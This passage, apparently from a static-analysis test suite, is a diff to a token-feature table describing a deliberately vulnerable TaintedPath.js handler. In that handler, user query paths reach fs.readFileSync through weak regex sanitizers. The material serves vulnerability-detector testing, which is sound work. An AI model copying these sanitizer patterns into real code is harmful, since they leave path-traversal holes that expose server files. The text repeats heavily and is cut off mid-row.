/^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:58 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:13:179:58 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:179:13:179:58 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:179:13:179:58 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:179:13:179:58 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -6302,6 +64690,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:179:13:179:58 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:179:13:179:58 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:179:13:179:58 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:179:16:179:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:16:179:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:16:179:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:16:179:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:16:179:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:40 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:40 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:40 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:40 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:40 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:57 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:57 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:57 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:57 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:29:179:57 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:179:29:179:57 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:179:29:179:57 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:179:29:179:57 | path.re ... /g, '') | calleeImports | fs | @@ -6311,6 +64719,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:179:29:179:57 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:179:29:179:57 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:179:29:179:57 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:179:34:179:40 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:34:179:40 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:179:34:179:40 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:179:34:179:40 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:179:34:179:40 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:179:42:179:52 | /\\.\\.\|BLA/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:179:42:179:52 | /\\.\\.\|BLA/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:179:42:179:52 | /\\.\\.\|BLA/g | calleeImports | url | @@ -6329,6 +64742,76 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:179:55:179:56 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:179:55:179:56 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:179:55:179:56 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:181:7:181:34 | !pathMo ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:181:7:181:34 | !pathMo ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:181:7:181:34 | !pathMo ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:181:7:181:34 | !pathMo ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:181:7:181:34 | !pathMo ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:17 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:17 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:17 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:17 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:17 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:28 | pathMod ... bsolute | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:28 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:28 | pathMod ... bsolute | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:28 | pathMod ... bsolute | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:28 | pathMod ... bsolute | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:34 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:34 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:34 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:34 | exceptional return of pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:34 | exceptional return of pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:34 | pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:34 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:34 | pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:34 | pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:181:8:181:34 | pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:181:19:181:28 | isAbsolute | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:181:19:181:28 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:181:19:181:28 | isAbsolute | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:181:19:181:28 | isAbsolute | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:181:19:181:28 | isAbsolute | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:7 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:7 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:7 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:7 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:13 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:13 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:13 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:13 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:13 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:56 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:56 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:56 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:56 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:56 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:56 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:56 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:56 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:56 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:182:5:182:56 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:182:9:182:13 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:9:182:13 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:182:9:182:13 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace 